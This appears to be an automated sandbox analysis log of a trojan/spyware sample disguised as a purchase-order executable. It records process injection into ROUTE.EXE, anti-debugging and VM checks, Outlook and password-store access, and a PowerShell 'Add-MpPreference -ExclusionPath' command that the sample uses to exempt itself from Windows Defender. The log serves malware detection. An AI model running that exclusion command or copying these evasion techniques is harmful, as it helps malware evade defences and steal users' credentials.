Source: PO -2025918.exe, 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1894470547.000000000737C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1895191077.0000000008C50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000000.1692063844.0000000000450000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
Source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001C8D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO -2025918.exe
Source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
Source: PO -2025918.exe, 00000004.00000002.2124918917.000000000171A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
Source: PO -2025918.exe Binary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
Source: PO -2025918.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO -2025918.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@11/8
Source: C:\Users\user\Desktop\PO -2025918.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO -2025918.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xct4qmlf.z35.ps1
Source: PO -2025918.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO -2025918.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\PO -2025918.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PO -2025918.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2306045699.0000000002E88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO -2025918.exe Virustotal: Detection: 52%
Source: PO -2025918.exe ReversingLabs: Detection: 57%
Source: unknown Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: version.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PO -2025918.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\PO -2025918.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\ROUTE.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PO -2025918.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO -2025918.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: PO -2025918.exe Static PE information: section name: .text entropy: 7.75594454439522

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: PO -2025918.exe PID: 6680, type: MEMORYSTR
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 2540000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 2750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 4750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 8E20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: 9E20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: A040000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: B040000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E rdtsc 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4035
Source: C:\Users\user\Desktop\PO -2025918.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\ROUTE.EXE API coverage: 2.6 %
Source: C:\Users\user\Desktop\PO -2025918.exe TID: 6756 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476 Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 4476 Thread sleep time: -78000s >= -30000s
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe TID: 6540 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\ROUTE.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose, 9_2_00AAC600
Source: C:\Users\user\Desktop\PO -2025918.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: PO -2025918.exe, 00000000.00000002.1894470547.0000000007342000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nWrCyfejRZk.exe, 0000000A.00000002.3540722904.0000000001570000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2423878838.00000260B784C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ROUTE.EXE Process queried: DebugPort
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E rdtsc 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00417A63 LdrLoadDll, 4_2_00417A63
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C561C3 mov eax, dword ptr fs:[00000030h] 4_2_01C561C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E1D0 mov ecx, dword ptr fs:[00000030h] 4_2_01C0E1D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C661E5 mov eax, dword ptr fs:[00000030h] 4_2_01C661E5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A197 mov eax, dword ptr fs:[00000030h] 4_2_01B8A197
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD0185 mov eax, dword ptr fs:[00000030h] 4_2_01BD0185
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C34180 mov eax, dword ptr fs:[00000030h] 4_2_01C34180
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC01F8 mov eax, dword ptr fs:[00000030h] 4_2_01BC01F8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4C188 mov eax, dword ptr fs:[00000030h] 4_2_01C4C188
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1019F mov eax, dword ptr fs:[00000030h] 4_2_01C1019F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov eax, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C24144 mov ecx, dword ptr fs:[00000030h] 4_2_01C24144
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0124 mov eax, dword ptr fs:[00000030h] 4_2_01BC0124
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C28158 mov eax, dword ptr fs:[00000030h] 4_2_01C28158
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64164 mov eax, dword ptr fs:[00000030h] 4_2_01C64164
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov eax, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3E10E mov ecx, dword ptr fs:[00000030h] 4_2_01C3E10E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C50115 mov eax, dword ptr fs:[00000030h] 4_2_01C50115
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 mov ecx, dword ptr fs:[00000030h] 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 mov eax, dword ptr fs:[00000030h] 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B96154 mov eax, dword ptr fs:[00000030h] 4_2_01B96154
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C156 mov eax, dword ptr fs:[00000030h] 4_2_01B8C156
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B880A0 mov eax, dword ptr fs:[00000030h] 4_2_01B880A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C120DE mov eax, dword ptr fs:[00000030h] 4_2_01C120DE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C160E0 mov eax, dword ptr fs:[00000030h] 4_2_01C160E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9208A mov eax, dword ptr fs:[00000030h] 4_2_01B9208A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8C0F0 mov eax, dword ptr fs:[00000030h] 4_2_01B8C0F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD20F0 mov ecx, dword ptr fs:[00000030h] 4_2_01BD20F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B980E9 mov eax, dword ptr fs:[00000030h] 4_2_01B980E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_01B8A0E3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C280A8 mov eax, dword ptr fs:[00000030h] 4_2_01C280A8
